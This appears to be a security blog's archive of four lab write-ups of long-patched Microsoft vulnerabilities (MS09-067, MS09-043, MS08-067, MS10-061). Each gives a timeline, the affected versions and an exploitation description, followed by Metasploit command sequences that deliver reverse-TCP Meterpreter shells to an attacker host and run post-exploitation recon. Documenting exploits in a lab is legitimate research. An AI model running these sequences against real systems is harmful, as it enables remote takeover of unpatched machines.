Tag Archives: Microsoft

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability reported to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB973475” provided the 2009-11-10
Metasploit PoC provided by hdm the 2010-02-12
Exploit-DB PoC provided by anonymous the 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_exce­l_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Exploits, Metasploit,

Timeline :

Vulnerability reported to Microsoft by ZDI the 2007-03-19
Metasploit PoC provided by hdm the 2009-07-13
Milw0rm PoC provided by anonymous the 2009-07-16
Microsoft patch “KB947319” provided the 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msd­so
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Exploits, Metasploit,

Timeline :

Milw0rm PoC provided by stephen lawler the 2008-10-23
Metasploit PoC provided by hdm the 2009-10-28
Microsoft patch “KB958644” provided the 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Exploits, Metasploit, ,

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) the 2010-09-14
Metasploit PoC released the 2010-09-17

    PoC provided by :

jduck
hdm

    Reference(s) :

CVE-2010-2729
MS10-061

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

    Tested on Windows XP SP3

    Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

    Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig